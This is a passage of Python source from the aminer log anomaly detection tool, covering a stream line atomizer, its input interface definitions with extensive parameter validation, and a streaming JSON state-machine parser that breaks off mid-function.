logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.continuous_timestamp_missing_warning = continuous_timestamp_missing_warning self.in_overlong_line_flag = False # If consuming of data was already attempted but the downstream handlers refused to handle it, keep the data and the parsed # object to avoid expensive duplicate parsing operation. The data does not include the line separators any more. self.last_unconsumed_log_atom = None def consume_data(self, stream_data, end_of_stream_flag=False): """Consume data from the underlying stream for atomizing. @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was consumed at the moment but data might be consumed later on. """ # Loop until as much streamData as possible was processed and then return a result. The correct processing of endOfStreamFlag # is tricky: by default, even when all data was processed, do one more iteration to handle also the flag. consumed_length = 0 if self.xml_format: if len(stream_data) == 0: return -1 log_atom = self.parse_log_atom(stream_data) if self.dispatch_atom(log_atom): return len(stream_data) while True: if self.last_unconsumed_log_atom is not None: # Keep length before dispatching: dispatch will reset the field. data_length = len(self.last_unconsumed_log_atom.raw_data) if self.dispatch_atom(self.last_unconsumed_log_atom): consumed_length += data_length + len(self.eol_sep) continue # Nothing consumed, tell upstream to wait if appropriate. if consumed_length == 0: consumed_length = -1 break line_end = None global breakout breakout = False global data data = None valid_json = False if self.json_format: state = json_machine(found_json) i = 0 for i, char in enumerate(stream_data[consumed_length:]): state = state(char) if breakout or state is None or i > self.max_line_length: break # check if the json is still valid, but the stream_data is at the end if not breakout and state is not None and i + consumed_length == len(stream_data) - 1 and not end_of_stream_flag: return consumed_length if 0 < i <= self.max_line_length and b"{" in stream_data[consumed_length:consumed_length+i+1] and data is not None: line_end = consumed_length + i + 1 valid_json = True elif i > self.max_line_length: self.in_overlong_line_flag = True if line_end is None: line_end = stream_data.find(self.eol_sep, consumed_length) if self.in_overlong_line_flag: if line_end < 0: consumed_length = len(stream_data) if end_of_stream_flag: self.dispatch_event("Overlong line terminated by end of stream", stream_data) self.in_overlong_line_flag = False break consumed_length = line_end + len(self.eol_sep) self.in_overlong_line_flag = False continue # This is the valid start of a normal/incomplete/overlong line. if line_end < 0: tail_length = len(stream_data) - consumed_length if tail_length > self.max_line_length: self.dispatch_event("Start of overlong line detected", stream_data[consumed_length:]) self.in_overlong_line_flag = True consumed_length = len(stream_data) # Stay in loop to handle also endOfStreamFlag! continue if end_of_stream_flag and (tail_length != 0): self.dispatch_event("Incomplete last line", stream_data[consumed_length:]) consumed_length = len(stream_data) break # This is at least a complete/overlong line. line_length = line_end + len(self.eol_sep) - consumed_length if line_length > self.max_line_length and not valid_json: self.dispatch_event("Overlong line detected", stream_data[consumed_length:line_end]) consumed_length = line_end + len(self.eol_sep) continue # This is a normal line. line_data = stream_data[consumed_length:line_end] log_atom = self.parse_log_atom(line_data) if self.dispatch_atom(log_atom): consumed_length = line_end + len(self.eol_sep) - ( valid_json and stream_data[line_end:line_end+len(self.eol_sep)] != self.eol_sep) continue if consumed_length == 0: # Downstream did not want the data, so tell upstream to block for a while. consumed_length = -1 break return consumed_length def parse_log_atom(self, parse_data): """Parse a log atom.""" log_atom = LogAtom(parse_data, None, None, self) if self.parsing_model is not None: match_context = MatchContext(parse_data) match_element = self.parsing_model.get_match_element("", match_context) if (match_element is not None) and not match_context.match_data: log_atom.parser_match = ParserMatch(match_element) for default_timestamp_path in self.default_timestamp_path_list: ts_match = log_atom.parser_match.get_match_dictionary().get(default_timestamp_path, None) if ts_match is not None: log_atom.set_timestamp(ts_match.match_object) break if log_atom.atom_time is None: if self.use_real_time: log_atom.atom_time = time.time() elif not self.printed_warning or self.continuous_timestamp_missing_warning: msg = "No timestamp was found for a log_atom. The timestamp_paths parameter is probably not set correctly in the" \ " Input config which might lead to errors. Alternatively the use_real_time parameter might be used in the Input " \ "config. To show this message only once, set continuous_timestamp_missing_warning to false in the Input config." print("WARNING: " + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).warning(msg) self.printed_warning = True return log_atom def dispatch_atom(self, log_atom): """Dispatch the data using the appropriate handlers. Also clean or set lastUnconsumed fields depending on outcome of dispatching. """ type(self).COUNTER = type(self).COUNTER + 1 if self.COUNTER % 1000 == 0 and self.COUNTER != 0: logging.getLogger(DEBUG_LOG_NAME).info("%d log atoms were processed totally.", self.COUNTER) was_consumed_flag = False if not self.atom_handler_list: was_consumed_flag = True else: for handler in self.atom_handler_list: if handler.receive_atom(log_atom): was_consumed_flag = True if was_consumed_flag: self.last_unconsumed_log_atom = None else: self.last_unconsumed_log_atom = log_atom return was_consumed_flag def dispatch_event(self, message, line_data): """Dispatch an event with given message and line data to all event handlers.""" if self.event_handler_list is None: return for handler in self.event_handler_list: handler.receive_event(f"Input.{self.__class__.__name__}", message, [line_data], None, None, self) InputInterfaces.py000066400000000000000000000774551500476301700337620ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input"""This file contains interface definition useful implemented by classes in this directory and for use from code outside this directory. All classes are defined in separate files, only the namespace references are added here to simplify the code. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc import time import logging from io import IOBase from aminer.AminerConfig import STAT_LOG_NAME, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.events.EventInterfaces import EventHandlerInterface from aminer import AminerConfig class AtomizerFactory(metaclass=abc.ABCMeta): """This is the common interface of all factories to create atomizers for new data sources. These atomizers are integrated into the downstream processing pipeline. """ @abc.abstractmethod def get_atomizer_for_resource(self, resource_name): """Get an atomizer for a given resource. @return a StreamAtomizer object """ class StreamAtomizer(metaclass=abc.ABCMeta): """This is the common interface of all binary stream atomizers. Atomizers in general should be good detecting and reporting malformed atoms but continue to function by attempting error correction or resynchronization with the stream after the bad atom. This type of atomizer also signals a stream source when the stream data cannot be handled at the moment to throttle reading of the underlying stream. """ @abc.abstractmethod def consume_data(self, stream_data, end_of_stream_flag=False): """Consume data from the underlying stream for atomizing. Data should only be consumed after splitting of an atom. The caller has to keep unconsumed data till the next invocation. @param stream_data the data offered to be consumed or zero length data when endOfStreamFlag is True (see below). @param end_of_stream_flag this flag is used to indicate, that the streamData offered is the last from the input stream. If the streamData does not form a complete atom, no rollover is expected or rollover would have honoured the atom boundaries, then the StreamAtomizer should treat that as an error. With rollover, consuming of the stream end data will signal the invoker to continue with data from next stream. When end of stream was reached but invoker has no streamData to send, it will invoke this method with zero-length data, which has to be consumed with a zero-length reply. @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was consumed at the moment but data might be consumed later on. The only situation where 0 is not an allowed return value is when end_of_stream_flag is set and stream_data not empty. """ class AtomHandlerInterface(metaclass=abc.ABCMeta): """This is the common interface of all handlers suitable for receiving log atoms.""" output_event_handlers = None def __init__(self, mutable_default_args=None, learn_mode=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, **kwargs): """Initialize the parameters of analysis components. See the classes of the analysis components for parameter descriptions. """ allowed_kwargs = [ "mutable_default_args", "aminer_config", "anomaly_event_handlers", "learn_mode", "persistence_id", "id_path_list", "stop_learning_time", "stop_learning_no_anomaly_time", "output_logline", "target_path_list", "constraint_list", "ignore_list", "allowlist_rules", "subhandler_list", "stop_when_handled_flag", "parsed_atom_handler_lookup_list", "default_parsed_atom_handler", "target_path", "parsed_atom_handler_dict", "allow_missing_values_flag", "tuple_transformation_function", "prob_thresh", "skip_repetitions", "max_hypotheses", "hypothesis_max_delta_time", "generation_probability", "generation_factor", "max_observations", "p0", "alpha", "candidates_size", "hypotheses_eval_delta_time", "delta_time_to_discard_hypothesis", "check_rules_flag", "window_size", "scoring_path_list", "num_windows", "confidence_factor", "empty_window_warnings", "early_exceeding_anomaly_output", "set_lower_limit", "set_upper_limit", "local_maximum_threshold", "seq_len", "allow_missing_id", "timeout", "allowed_id_tuples", "min_num_vals", "max_num_vals", "save_values", "track_time_for_tsa", "waiting_time", "num_sections_waiting_time", "histogram_definitions", "report_interval", "reset_after_report_flag", "target_value_list", "timestamp_path", "min_bin_elements", "min_bin_time", "debug_mode", "stream", "separator", "missing_value_string", "num_log_lines_solidify_matrix", "time_output_threshold", "anomaly_threshold", "default_interval", "realert_interval", "combine_values", "min_allowed_time_diff", "target_label_list", "split_reports_flag", "event_type_detector", "num_init", "force_period_length", "set_period_length", "alpha_bt", "num_results_bt", "num_min_time_history", "num_max_time_history", "num_periods_tsa_ini", "time_period_length", "max_time_diff", "num_reduce_time_list", "min_anomaly_score", "min_variance", "parallel_check_count", "record_count_before_event", "use_path_match", "use_value_match", "min_rule_attributes", "max_rule_attributes", "exit_on_error_flag", "acf_pause_interval_percentage", "acf_auto_pause_interval", "acf_auto_pause_interval_num_min", "build_sum_over_values", "num_division_time_step", "acf_threshold", "round_time_interval_threshold", "min_log_lines_per_time_step", "num_update", "disc_div_thres", "num_steps_create_new_rules", "num_upd_until_validation", "num_end_learning_phase", "check_cor_thres", "check_cor_prob_thres", "check_cor_num_thres", "min_values_cors_thres", "new_vals_alarm_thres", "num_bt", "used_homogeneity_test", "alpha_chisquare_test", "max_dist_rule_distr", "used_presel_meth", "intersect_presel_meth", "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit", "match_disc_distr_threshold", "used_cor_meth", "used_validate_cor_meth", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "used_gof_test", "gof_alpha", "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres", "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_pause_others", "test_gof_int", "num_stop_update", "silence_output_without_confidence", "silence_output_except_indicator", "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update", "num_updates_until_var_reduction", "var_reduction_thres", "num_skipped_ind_for_weights", "num_ind_for_weights", "used_multinomial_test", "use_empiric_distr", "used_range_test", "range_alpha", "range_threshold", "num_reinit_range", "range_limits_factor", "dw_alpha", "save_statistics", "idf", "norm", "add_normal", "check_empty_windows", "unique_path_list", "default_freqs", "var_factor", "avg_factor", "log_resource_ignore_list" ] self.log_success = 0 self.log_total = 0 for argument, value in list(locals().items())[1:-1]: # skip self parameter and kwargs if value is not None: setattr(self, argument, value) for argument, value in kwargs.items(): # skip self parameter and kwargs if argument not in allowed_kwargs: msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) setattr(self, argument, value) # test booleans for attr in ("learn_mode", "output_logline", "split_reports_flag", "exit_on_error_flag", "stop_when_handled_flag", "debug_mode", "combine_values", "reset_after_report_flag", "allow_missing_values_flag", "allow_missing_id", "save_values", "use_path_match", "use_value_match", "check_rules_flag", "empty_window_warnings", "early_exceeding_anomaly_output", "default_freqs", "skip_repetitions", "idf", "norm", "add_normal", "check_empty_windows", "force_period_length", "acf_auto_pause_interval", "build_sum_over_values", "intersect_presel_meth", "test_gof_int", "num_stop_update", "silence_output_without_confidence", "silence_output_except_indicator", "use_empiric_distr", "save_statistics"): if hasattr(self, attr) and (attr in kwargs or attr == "learn_mode"): attr_val = self.__getattribute__(attr) if not isinstance(attr_val, bool): msg = f"{attr} has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "use_path_match") and hasattr(self, "use_value_match") and not self.use_path_match and not self.use_value_match: msg = "Either use_path_match or use_value_match must be used." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # test strings: non_empty_strings = ["persistence_id", "target_path", "used_homogeneity_test", "used_gof_test", "used_multinomial_test", "used_range_test"] for attr in non_empty_strings + ["timestamp_path"]: if hasattr(self, attr): attr_val = self.__getattribute__(attr) if not (attr not in non_empty_strings and attr_val is None) and not isinstance(attr_val, str): msg = f"{attr} has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) # test non-empty strings if attr_val is not None and len(attr_val) == 0: msg = f"{attr} must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # test byte-strings for attr in ["separator", "missing_value_string"]: if hasattr(self, attr): attr_val = self.__getattribute__(attr) if not isinstance(attr_val, bytes): msg = f"{attr} has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) # test non-empty byte-strings if attr in ("separator",) and (attr is None or len(attr_val) < 1): msg = f"{attr} must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # list of strings for attr in ["used_presel_meth", "used_cor_meth", "used_validate_cor_meth"]: if hasattr(self, attr): attr_val = self.__getattribute__(attr) if attr_val is not None and (not isinstance(attr_val, list) or not all(isinstance(handler, str) for handler in attr_val)): msg = f"Only subclasses of String are allowed in {attr}." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) # test numeric values integer_only = [ "min_bin_elements", "min_num_vals", "max_num_vals", "parallel_check_count", "record_count_before_event", "min_rule_attributes", "max_rule_attributes", "max_hypotheses", "max_observations", "candidates_size", "num_windows", "seq_len", "num_log_lines_solidify_matrix", "report_interval", "num_init", "set_period_length", "num_results_bt", "num_periods_tsa_ini", "acf_auto_pause_interval_num_min", "num_division_time_step", "set_period_length", "min_log_lines_per_time_step", "time_period_length", "max_time_diff", "num_reduce_time_list", "num_update", "num_steps_create_new_rules", "num_end_learning_phase", "check_cor_num_thres", "min_values_cors_thres", "num_bt", "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_pause_others", "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update", "num_updates_until_var_reduction", "num_skipped_ind_for_weights", "num_ind_for_weights", "num_reinit_range"] non_negative = [ "set_lower_limit", "time_output_threshold", "disc_div_thres", "num_upd_until_validation", "num_upd_until_validation", "check_cor_thres", "check_cor_prob_thres", "check_cor_num_thres", "min_values_cors_thres", "alpha_chisquare_test", "max_dist_rule_distr", "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit", "match_disc_distr_threshold", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "gof_alpha", "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres", "var_reduction_thres", "range_alpha", "range_threshold", "num_pause_others"] non_zero_or_negative = [ "min_bin_time", "min_bin_elements", "default_interval", "realert_interval", "min_allowed_time_diff", "parallel_check_count", "record_count_before_event", "max_rule_attributes", "max_hypotheses", "hypothesis_max_delta_time", "max_observations", "candidates_size", "hypotheses_eval_delta_time", "delta_time_to_discard_hypothesis", "window_size", "num_windows", "seq_len", "num_log_lines_solidify_matrix", "set_upper_limit", "timeout", "num_init", "set_period_length", "num_min_time_history", "num_max_time_history", "num_periods_tsa_ini", "num_results_bt", "waiting_time", "num_sections_waiting_time", "acf_auto_pause_interval_num_min", "num_division_time_step", "set_period_length", "min_log_lines_per_time_step", "time_period_length", "max_time_diff", "num_reduce_time_list", "min_anomaly_score", "num_update", "new_vals_alarm_thres", "num_bt", "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update", "num_updates_until_var_reduction", "num_skipped_ind_for_weights", "num_ind_for_weights", "num_reinit_range", "range_limits_factor", "dw_alpha"] zero_to_one = [ "generation_probability", "generation_factor", "p0", "alpha", "confidence_factor", "prob_thresh", "anomaly_threshold", "alpha", "alpha_bt", "acf_pause_interval_percentage", "acf_threshold", "round_time_interval_threshold", "min_variance", "local_maximum_threshold", "disc_div_thres", "check_cor_thres", "check_cor_prob_thres", "alpha_chisquare_test", "max_dist_rule_distr", "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit", "match_disc_distr_threshold", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "gof_alpha", "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres", "var_reduction_thres", "range_alpha", "range_threshold", "dw_alpha"] nullable = ["stop_learning_time", "stop_learning_no_anomaly_time", "set_lower_limit", "set_upper_limit", "timeout"] for attr in set([] + integer_only + non_negative + non_zero_or_negative + zero_to_one): if hasattr(self, attr): attr_val = self.__getattribute__(attr) if attr in integer_only and (isinstance(attr_val, bool) or not isinstance(attr_val, int)): msg = f"{attr} has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if (isinstance(attr_val, bool) or not isinstance(attr_val, (int, float))) and not (attr in nullable and attr_val is None): msg = f"{attr} has to be of the type float or integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) # test non-negative values if attr in non_negative and attr_val is not None and attr_val < 0: msg = f"{attr} must not be negative." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # test non-zero-or-negative values if attr in non_zero_or_negative and attr_val is not None and attr_val <= 0: msg = f"{attr} must not be zero or negative." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # test zero-to-one values if attr in zero_to_one and attr_val is not None and (attr_val < 0 or attr_val > 1): msg = f"{attr} must be a value between zero and one." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "min_num_vals") and hasattr(self, "max_num_vals") and ( self.min_num_vals >= self.max_num_vals or self.min_num_vals < 0): msg = "min_num_vals must be smaller than max_num_vals and both values must be bigger than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "num_min_time_history") and hasattr(self, "num_max_time_history") and ( self.num_min_time_history >= self.num_max_time_history or self.num_min_time_history < 0): msg = "num_min_time_history must be smaller than num_max_time_history and both values must be bigger than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "num_s_gof_values") and hasattr(self, "num_init") and hasattr(self, "num_update") and ( self.num_s_gof_values < self.num_update or self.num_s_gof_values > self.num_init): msg = "num_s_gof_values must be smaller than or equal to num_init and greater than or equal to num_init." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if learn_mode is False and (stop_learning_time is not None or stop_learning_no_anomaly_time is not None): msg = "It is not possible to use the stop_learning_time or stop_learning_no_anomaly_time when the learn_mode is False." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if stop_learning_time is not None and stop_learning_no_anomaly_time is not None: msg = "stop_learning_time is mutually exclusive to stop_learning_no_anomaly_time. Only one of these attributes may be used." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if (stop_learning_time is not None and stop_learning_time <= 0) or ( stop_learning_no_anomaly_time is not None and stop_learning_no_anomaly_time <= 0): msg = "stop_learning_time and stop_learning_no_anomaly_time must be bigger than 0." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "aminer_config"): self.next_persist_time = time.time() + self.aminer_config.config_properties.get( KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) if hasattr(self, "anomaly_event_handlers") and ( not isinstance(self.anomaly_event_handlers, list) or not all(isinstance(handler, EventHandlerInterface) for handler in self.anomaly_event_handlers)): msg = "Only subclasses of EventHandlerInterface are allowed in anomaly_event_handlers." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.stop_learning_time = None self.stop_learning_time_initialized = False self.stop_learning_time = stop_learning_time self.stop_learning_no_anomaly_time = stop_learning_no_anomaly_time if mutable_default_args is not None: for argument in mutable_default_args: if hasattr(self, argument) and getattr(self, argument) is not None: continue if argument.endswith("list"): setattr(self, argument, []) elif argument.endswith("dict"): setattr(self, argument, {}) elif argument.endswith("set"): setattr(self, argument, set()) elif argument.endswith("tuple"): setattr(self, argument, ()) if hasattr(self, "subhandler_list"): if (not isinstance(self.subhandler_list, list)) or \ (not all(isinstance(handler, AtomHandlerInterface) for handler in self.subhandler_list)): msg = "Only subclasses of AtomHandlerInterface are allowed in subhandler_list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for handler_pos, handler_element in enumerate(self.subhandler_list): self.subhandler_list[handler_pos] = (handler_element, self.stop_when_handled_flag) if hasattr(self, "parsed_atom_handler_lookup_list") and ( not isinstance(self.parsed_atom_handler_lookup_list, list) or not all(isinstance(val, tuple) for val in self.parsed_atom_handler_lookup_list) or not all(len(val) == 2 for val in self.parsed_atom_handler_lookup_list) or not all(isinstance(path, str) and isinstance(handler, AtomHandlerInterface) for path, handler in self.parsed_atom_handler_lookup_list)): msg = "Only subclasses of (String, AtomHandlerInterface) are allowed in parsed_atom_handler_lookup_list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "default_parsed_atom_handler") and self.default_parsed_atom_handler is not None and \ not isinstance(self.default_parsed_atom_handler, AtomHandlerInterface): msg = "Only subclasses of AtomHandlerInterface are allowed in default_parsed_atom_handler." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "parsed_atom_handler_dict") and ( not isinstance(self.parsed_atom_handler_dict, dict) or not all(isinstance(key, bytes) for key in self.parsed_atom_handler_dict.keys()) or not all(isinstance(handler, AtomHandlerInterface) for handler in self.parsed_atom_handler_dict.values())): msg = "Only subclasses of AtomHandlerInterface are allowed in parsed_atom_handler_dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "allowed_id_tuples"): if self.allowed_id_tuples is None: self.allowed_id_tuples = [] if not isinstance(self.allowed_id_tuples, list) or not all(isinstance(x, tuple) and len(x) != 0 for x in self.allowed_id_tuples): msg = "allowed_id_tuples must be of type list with tuples as values." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.allowed_id_tuples = [tuple(x) for x in self.allowed_id_tuples] if hasattr(self, "confidence_factor") and not 0 <= self.confidence_factor <= 1: logging.getLogger(DEBUG_LOG_NAME).warning('confidence_factor must be in the range [0,1]!') self.confidence_factor = 1 if not hasattr(self, "persistence_id"): self.persistence_id = None # persistence_id is always needed. for attr in ("id_path_list", "target_path_list", "constraint_list", "ignore_list", "target_label_list", "unique_path_list", "scoring_path_list", "log_resource_ignore_list"): if hasattr(self, attr) and self.__getattribute__(attr) is not None: attr_val = self.__getattribute__(attr) if not isinstance(attr_val, list): msg = f"{attr} has to be of the type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for path in attr_val: if not isinstance(path, str): msg = f"{attr} values must be of the type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if path == "": msg = f"{attr} values must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "log_resource_ignore_list"): for path in self.log_resource_ignore_list: if not (path.startswith("file://") or path.startswith("unix://")): msg = "log_resource_ignore_list values must start with file:// or unix://." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "target_value_list") and self.target_value_list is not None and not isinstance(self.target_value_list, list): msg = "target_value_list has to be of the type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "set_lower_limit") and self.set_lower_limit is not None and hasattr(self, "set_upper_limit") and \ self.set_upper_limit is not None and self.set_lower_limit >= self.set_upper_limit: msg = "set_lower_limit must be smaller than set_upper_limit." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "stream") and not isinstance(self.stream, IOBase): msg = "stream must be an instance of IOBase." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "allowlist_rules"): if not isinstance(self.allowlist_rules, list): msg = "allowlist_rules has to be of the type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.allowlist_rules) == 0: msg = "allowlist_rules must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "idf") and self.idf and not self.id_path_list: msg = "id_path_list must be set when using idf=True." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) @abc.abstractmethod def receive_atom(self, log_atom): """Receive a log atom from a source. @param log_atom binary raw atom data @return True if this handler was really able to handle and process the atom. Depending on this information, the caller may decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented at each source implementation sending LogAtoms. """ def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL > 0: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 class PersistableComponentInterface(metaclass=abc.ABCMeta): """This is the common interface of all handlers suitable for persisting data.""" @abc.abstractmethod def __init__(self): """Initialize the PersistableComponentInterface.""" @abc.abstractmethod def do_persist(self, log_atom): """Immediately write persistence data to storage.""" @abc.abstractmethod def load_persistence_data(self): """Load the persistence data from storage.""" class LogDataResource(metaclass=abc.ABCMeta): """This is the superinterface of each logdata resource monitored by aminer. The interface is designed in a way, that instances of same subclass can be used both on aminer parent process side for keeping track of the resources and forwarding the file descriptors to the child, but also on child side for the same purpose. The only difference is, that on child side, the stream reading and read continuation features are used also. After creation on child side, this is the sole place for reading and closing the streams. An external process may use the file descriptor only to wait for input via select. """ @abc.abstractmethod def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """Create a new LogDataResource. Object creation must not touch the logStreamFd or read any data, unless repositioning_data was given. In the later case, the stream has to support seek operation to reread data. @param log_resource_name the unique encoded name of this source as byte array. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attemt to position the the stream using the given data. """ @abc.abstractmethod def open(self, reopen_flag=False): """Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid logStreamFd was already provided, is still open and reopenFlag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ @abc.abstractmethod def get_resource_name(self): """Get the name of this log resource.""" @abc.abstractmethod def get_file_descriptor(self): """Get the file descriptor of this open resource.""" @abc.abstractmethod def fill_buffer(self): """Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ @abc.abstractmethod def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" @abc.abstractmethod def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable. """ @abc.abstractmethod def close(self): """Close this logdata resource. Data access methods will not work any more afterwards. """ JsonStateMachine.py000066400000000000000000000206021500476301700340340ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input# DISCLAIMER: adapted code from # https://stackoverflow.com/questions/6886283/how-i-can-i-lazily-read-multiple-json-values-from-a-file-stream-in-python # A streaming byte oriented JSON parser. Feed it a single byte at a time and # it will emit complete objects as it comes across them. Whitespace within and # between objects is ignored. This means it can parse newline delimited JSON. import math def json_machine(emit, next_func=None): def _value(byte_data): if not byte_data: return None if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _value # Ignore whitespace # only allow json objects in our case if byte_data != 0x7b and next_func is _value: return None if byte_data == 0x22: # " return string_machine(on_value) if byte_data in (0x2b, 0x2d) or (0x30 <= byte_data < 0x3a): # -, + or 0-9 return number_machine(byte_data, on_number) if byte_data == 0x7b: #: return object_machine(on_value) if byte_data == 0x5b: # [ return array_machine(on_value) if byte_data == 0x74: # t return constant_machine(TRUE, True, on_value) if byte_data == 0x66: # f return constant_machine(FALSE, False, on_value) if byte_data == 0x6e: # n return constant_machine(NULL, None, on_value) if next_func is _value: return None return next_func(byte_data) def on_value(value): emit(value) return next_func def on_number(number, byte): emit(number) return _value(byte) next_func = next_func or _value return _value TRUE = [0x72, 0x75, 0x65] FALSE = [0x61, 0x6c, 0x73, 0x65] NULL = [0x75, 0x6c, 0x6c] def constant_machine(bytes_data, value, emit): i = 0 length = len(bytes_data) def _constant(byte_data): nonlocal i if byte_data != bytes_data[i]: i += 1 return None i += 1 if i < length: return _constant return emit(value) return _constant def string_machine(emit): string = "" def _string(byte_data): nonlocal string if byte_data == 0x22: # " return emit(string) if byte_data == 0x5c: # \ return _escaped_string if byte_data & 0x80: # UTF-8 handling return utf8_machine(byte_data, on_char_code) if byte_data < 0x20 and byte_data != 0xa: # ASCII control character - \n is allowed return None string += chr(byte_data) return _string def _escaped_string(byte_data): nonlocal string if byte_data in (0x22, 0x5c, 0x2f): # " \ / string += chr(byte_data) return _string if byte_data == 0x62: # b string += "\b" return _string if byte_data == 0x66: # f string += "\f" return _string if byte_data == 0x6e: # n string += "\n" return _string if byte_data == 0x72: # r string += "\r" return _string if byte_data == 0x74: # t string += "\t" return _string if byte_data == 0x75: # u return hex_machine(on_char_code) return None def on_char_code(char_code): nonlocal string string += chr(char_code) return _string return _string # Nestable state machine for UTF-8 Decoding. def utf8_machine(byte_data, emit): left = 0 num = 0 def _utf8(byte_data): nonlocal num, left if (byte_data & 0xc0) != 0x80: return None left = left - 1 num |= (byte_data & 0x3f) << (left * 6) if left: return _utf8 return emit(num) if 0xc0 <= byte_data < 0xe0: # 2-byte UTF-8 Character left = 1 num = (byte_data & 0x1f) << 6 return _utf8 if 